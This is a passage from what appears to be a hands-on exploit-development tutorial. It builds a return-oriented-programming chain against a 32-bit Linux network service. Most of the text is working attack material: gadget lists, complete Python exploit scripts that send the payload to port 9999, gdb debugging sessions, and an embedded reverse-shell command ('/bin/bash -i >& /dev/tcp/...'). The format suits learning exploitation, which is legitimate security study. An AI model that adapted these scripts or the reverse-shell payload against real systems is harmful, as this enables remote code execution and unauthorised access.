Because we can't use nulls in our payload we have to calculate 1088 at runtime, we can do this using only eax and ebx, but first we have to move the value we currently have in eax, we'll move it to edx using this gadget:

1	0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret

Along with moving the value in eax to edx, it pops 3 values off of the stack, we need to deal with this because if we put another gadget directly below this 1 it will be popped off into a register and will not be used.

We will use 0xeeeeeeee to represent junk values that will be popped off the stack but not used.

To calculate 1088 without using null bytes we will use 0xaaaaaaaa and substract the relevent number, to find out that number we do 0xaaaaaaaa - 1088 = 0xaaaaa66a.

We can subtract 2 values in eax and ebx using the following gadget:

1	0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret

And we can use the following 2 gadgets to get the required values into eax and ebx respectively:

1 2	0x080a8576 : pop eax ; ret 0x08057b7e : pop ebx ; ret

Here I think is a good time to mention the importance of keeping notes while you are creating this exploit, here are my notes so far:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret 0x080525d0 : xchg eax, ebp ; ret 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee ---------------------------- edx contains address of 0x080525d0 ---------------------------- time to calculate the distance to the end of data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------- eax contains the distance to the end of data #################DATA################## ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff

It's worth noting that to get to a lower value in our payload we need to increase the address and if we want to get to a higher value we need to decrease the address. This is a very important point!

Knowing this, to get to the end of the data from the higher up address we received earlier from esp, we need to add the address to the distance we just calculated.

We can do the addition to calculate the address that we want using this gadget:

1	0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret

This will add eax and ebx and store the result in eax.

First we need to move the value from eax into ebx, for that we can use this gadget:

1	0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret

And then move the address stored in edx (the first address we retrieved from esp) into eax:

1	0x0807abcc : mov eax, edx ; ret

If we put all of these together (while remembering to include junk values for the irrelevant pop instructions contained within the gadgets) we get:

1 2 3 4 5 6 7

0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop

eax will now contain the address of the end of our data.

If you look again at the data you will realise that this address should contain nulls (its the last lot of 0xffffffff right at the end of our payload).

As we have this address we should go ahead and write nulls here so we don't have to worry about it later.

We can write whatever is stored in the eax register to an address stored in the edx register using this gadget:

1	0x08083f21 : mov dword ptr [edx], eax ; ret

Before we can do that we need to move the address from eax into edx:

1	0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret

And we need to put 0 into eax:

1	0x08099c0f : xor eax, eax ; ret

Using all of this knowledge our notes should look like this (again bear in mind the junk values we need to insert):

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret 0x080525d0 : xchg eax, ebp ; ret 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee ---------------------------- edx contains address of 0x080525d0 ---------------------------- time to calculate the distance to the end of data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------- eax contains the distance to the end of data 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of end of data 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret #################DATA################## ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff

Now would be a good time to test the exploit again, what we will do here is pad the rest of the exploit so that our data starts 1000 bytes after our second ROP gadget, this way we can see if our exploit is calculating the correct values.

Here is the updated exploit:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

#!/usr/bin/env python import socket payload = "A" * 532 payload += "\x5a\x71\x07\x08" # ebp = esp payload += "\xd0\x25\x05\x08" # xchg eax, ebp payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x6a\xa6\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xab\x32\x07\x08" # eax += ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 payload += "A" * 904 # 1000 - 96 (96 is the current size of the payload from the second ROP gadget payload += "////bin/bash" payload += "\xff\xff\xff\xff" payload += "\xff\xff" + "-c" payload += "\xff\xff\xff\xff" payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1" payload += "\xff\xff\xff\xff" payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash payload += "\xcc\xcc\xcc\xcc" # pointer to -c payload += "\xdd\xdd\xdd\xdd" # pointer to args payload += "\xff\xff\xff\xff" # create the tcp socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect to 127.0.0.1 port 9999 s.connect(("127.0.0.1", 9999)) # send our payload s.send(payload) # close the socket s.close()

This time I will set the breakpoint at 0x08083f21 and ensure everything is correct:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

(gdb) delete 1 (gdb) break *0x08083f21 Breakpoint 2 at 0x8083f21 (gdb) display/x $ebx 3: /x $ebx = 0x0 (gdb) display/x $edx 4: /x $edx = 0xbfffe740 (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/appuser/app-net 0xbfffe7a4: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe7b4: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe7c4: 0x41414141 0x41414141 => 0x8083f21 <_dl_get_tls_static_info+17>: mov DWORD PTR [edx],eax Breakpoint 2, 0x08083f21 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb80 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0x0 1: /x $ebp = 0xeeeeeeee (gdb) x/xw 0xbfffeb80 0xbfffeb80: 0xffffffff (gdb) stepi 0xbfffe7a4: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe7b4: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe7c4: 0x41414141 0x41414141 => 0x8083f23 <_dl_get_tls_static_info+19>: ret 0x08083f23 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb80 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0x0 1: /x $ebp = 0xeeeeeeee (gdb) x/xw 0xbfffeb80 0xbfffeb80: 0x00000000 (gdb) x/xw 0xbfffeb7c 0xbfffeb7c: 0xdddddddd (gdb) x/xw 0xbfffeb78 0xbfffeb78: 0xcccccccc (gdb) x/xw 0xbfffeb74 0xbfffeb74: 0xbbbbbbbb

As you can see, we've successfully written nulls where the f's used to be at the end of our data.

After, I've printed the 3 values further up our payload (which are just where our pointers will be) just to show that it is infact the correct address we are writing to.

Now that we've fixed the nulls at the bottom, the next problem we should approach is setting the value for the ecx register, as this will be the second most difficult challenge.

Setting ECX

The gadget that I felt was the best chance of getting a value into ecx is:

1	0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret

ecx needs to contain the address of the beginning of our pointers in the data, where we have put 0xbbbbbbbb.

There is a big problem here, this code will jump to the fixed address 0x804dca1 if the value pointed to by eax does not contain 0.

This means we first have to write 0 there before we can set ecx.

We will use the exact same method that we just used to write 0 to the end of the data, except this time we will calculate the address relative to the current value of edx (the end of the data section).

We use the following series of ROP gadgets to do this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret 0x0807abcc : mov eax, edx ; ret

We've used all of these gadgets already so unless we miscalculate the distance somewhere this should all work fine and we can run the other gadget to set ecx.

Once we run the gadget to move eax into ecx the value of ecx is set and will no longer need to be touched, this also means we cannot run any gadgets that alter ecx in anyway.

Calculating The Address Of A String And Setting The Pointer

As we already have the address of the first pointer in edx we might as well set this to the correct value.

This should contain the address of the string ////bin/bash, which is the first string in the data section.

If you work it out you will see that the start of the relevant string is 18 double words, or 72 bytes, from the current value of edx (and ecx).

We can now use the exact same gadgets that we've already used to calculate the address of the string and write it to the location pointed to by edx:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash 0x08083f21 : mov dword ptr [edx], eax ; ret

Now would be a good time to test the exploit again.

At the end of this we expect ecx and edx to point to the beginning of our pointers, eax should point to our ////bin/bash string which should also be wirrten to the address that ecx and edx points to.

We have also wirtten nulls at the end of our data (but we haven't changed this code and we've already tested it so that should work fine unless we've made a calculation error).

Here is the updated notes:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret 0x080525d0 : xchg eax, ebp ; ret 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee ---------------------------- edx contains address of 0x080525d0 ---------------------------- time to calculate the distance to the end of data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------- eax contains the distance to the end of data 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of end of data 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- write nulls to the end of our data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret 0x0807abcc : mov eax, edx ; ret 0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804 dca1 ; pop ebp ; ret 0xeeeeeeee : junk value to pop ---------------------------------------------------- ecx contains the address of ////bin/bash pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash 0x08083f21 : mov dword ptr [edx], eax ; ret #################DATA################## ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff

This is our updated exploit:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

#!/usr/bin/env python import socket payload = "A" * 532 payload += "\x5a\x71\x07\x08" # ebp = esp payload += "\xd0\x25\x05\x08" # xchg eax, ebp payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the distance to the end of the payload payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x6a\xa6\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xab\x32\x07\x08" # eax += ebx payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Write 0 to the end of the data payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 ############### Work out the distance to 0xbbbbbbbb payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x9e\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Move address value into ecx payload += "\x0e\x82\x0a\x08" # edx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x0f\x9c\x09\x08" # eax = 0 payload += "\x21\x3f\x08\x08" # [edx] = eax = 0 payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xa2\xdc\x04\x08" # ecx = eax payload += "\xee\xee\xee\xee" ############### Work out the distance to ////bin/bash string payload += "\x76\x85\x0a\x08" # pop eax payload += "\xaa\xaa\xaa\xaa" payload += "\x7e\x7b\x05\x08" # pop ebx payload += "\x62\xaa\xaa\xaa" payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" ############### Work out the address of ////bin/bash string and write to pointer payload += "\xbe\x35\x05\x08" # ebx = eax payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\xcc\xab\x07\x08" # eax = edx payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string) payload += "\xee\xee\xee\xee" payload += "\xee\xee\xee\xee" payload += "\x21\x3f\x08\x08" # [edx] = eax payload += "A" * (1000 - (len(payload) - 540)) # 1000 - current size of the payload from the second ROP gadget payload += "////bin/bash" payload += "\xff\xff\xff\xff" payload += "\xff\xff" + "-c" payload += "\xff\xff\xff\xff" payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1" payload += "\xff\xff\xff\xff" payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash payload += "\xcc\xcc\xcc\xcc" # pointer to -c payload += "\xdd\xdd\xdd\xdd" # pointer to args payload += "\xff\xff\xff\xff" # create the tcp socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect to 127.0.0.1 port 9999 s.connect(("127.0.0.1", 9999)) # send our payload s.send(payload) # close the socket s.close()

When we test this we want to break at 0x08083f21, but there are 3 times we are using this gadget so we should continue through the first 2 and then check the values:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

(gdb) delete 2 (gdb) break *0x08083f21 Breakpoint 3 at 0x8083f21 (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/appuser/app-net 0xbfffe7a4: 0x080a8576 0xaaaaaaaa 0x08057b7e 0xaaaaaa9e 0xbfffe7b4: 0x080748fc 0xeeeeeeee 0xeeeeeeee 0x080535be 0xbfffe7c4: 0xeeeeeeee 0xeeeeeeee => 0x8083f21 <_dl_get_tls_static_info+17>: mov DWORD PTR [edx],eax Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb80 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0x0 1: /x $ebp = 0xeeeeeeee (gdb) continue Continuing. 0xbfffe7f4: 0x0807abcc 0x0804dca2 0xeeeeeeee 0x080a8576 0xbfffe804: 0xaaaaaaaa 0x08057b7e 0xaaaaaa62 0x080748fc 0xbfffe814: 0xeeeeeeee 0xeeeeeeee => 0x8083f21 <_dl_get_tls_static_info+17>: mov DWORD PTR [edx],eax Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb74 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0x0 1: /x $ebp = 0xeeeeeeee (gdb) continue Continuing. 0xbfffe83c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe84c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe85c: 0x41414141 0x41414141 => 0x8083f21 <_dl_get_tls_static_info+17>: mov DWORD PTR [edx],eax Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb74 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0xbfffeb2c 1: /x $ebp = 0xeeeeeeee (gdb) x/xw 0xbfffeb74 0xbfffeb74: 0x00000000 (gdb) stepi 0xbfffe83c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe84c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffe85c: 0x41414141 0x41414141 => 0x8083f23 <_dl_get_tls_static_info+19>: ret 0x08083f23 in _dl_get_tls_static_info () 4: /x $edx = 0xbfffeb74 3: /x $ebx = 0xeeeeeeee 2: /x $eax = 0xbfffeb2c 1: /x $ebp = 0xeeeeeeee (gdb) x/xw 0xbfffeb74 0xbfffeb74: 0xbfffeb2c (gdb) x/s 0xbfffeb2c 0xbfffeb2c: "////bin/bash\377\377\377\377\377\377-c\377\377\377\377/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1\377\377\377\377,\353\377\277\314\314\314\314\335\335\335", <incomplete sequence \335>

Clearly we can see that we have written the correct address to the pointer and it now points to the correct string.

The reason we have the rest of the stuff there is because the examine command (x) in gdb when printing a string (x/s) stops when the first null is reached and we haven't changed the null termination to the end of the string yet.

Calculating And Writing The Remaining Nulls

We should now go about writing the nulls to the relevant parts in our data, we still have 3 nulls to write, 1 to terminate each of the string arguments.

I will not walk through each of these because I will use the exact same method but it is important to test the exploit at regular intevals to ensure you aren't miscalculating any values because if you do that it will spoil the rest of the exploit.

If it isn't obvious by now, what I'm doing is using edx as a pointer to where I want to write, using eax and ebx to work out the distance from the current value of edx to the next value, then calculating the address of the next value and finally moving that value into edx and writing zero to it.

Here are my notes updated to the point where all of the nulls have been set:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret 0x080525d0 : xchg eax, ebp ; ret 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee ---------------------------- edx contains address of 0x080525d0 ---------------------------- time to calculate the distance to the end of data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------- eax contains the distance to the end of data 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of end of data 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- write nulls to the end of our data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret 0x0807abcc : mov eax, edx ; ret 0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804 dca1 ; pop ebp ; ret 0xeeeeeeee : junk value to pop ---------------------------------------------------- ecx contains the address of ////bin/bash pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : 